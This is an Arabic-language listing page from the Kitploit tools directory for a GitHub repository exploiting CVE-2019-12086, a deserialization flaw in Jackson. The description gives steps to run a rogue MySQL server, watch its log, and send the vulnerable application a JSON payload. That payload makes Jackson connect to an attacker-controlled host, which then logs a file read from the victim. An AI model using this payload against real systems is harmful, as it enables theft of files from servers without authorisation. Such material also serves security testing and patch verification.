Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-12086 — Jackson إلغاء التسلسل | Kitploit
أدوات/GitHubGitHub/al1ex/cve-2019-12086
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن قواعد البيانات
GitHubal1ex/cve-2019-12086

CVE-2019-12086

Jackson إلغاء التسلسل

عرض المستودع
13منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

وصف المستند

CVE-2019-12086 jackson unserialize

استغلال الثغرة

  1. تشغيل خادم MySQL الخبيث:

python rogue_mysql_server.py

  1. عرض mysql.log في نفس الدليل:

tail -f mysql.log

  1. إرسال JSON التالي إلى التطبيق المعرض للثغرة:

["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]

عند إلغاء تسلسل Jackson لسلسلة JSON الخبيثة، سيتصل بخادم MySQL الخبيث، وسيتم كتابة محتوى الملف المقروء في mysql.log للخادم الخبيث.

تنزيل الأداة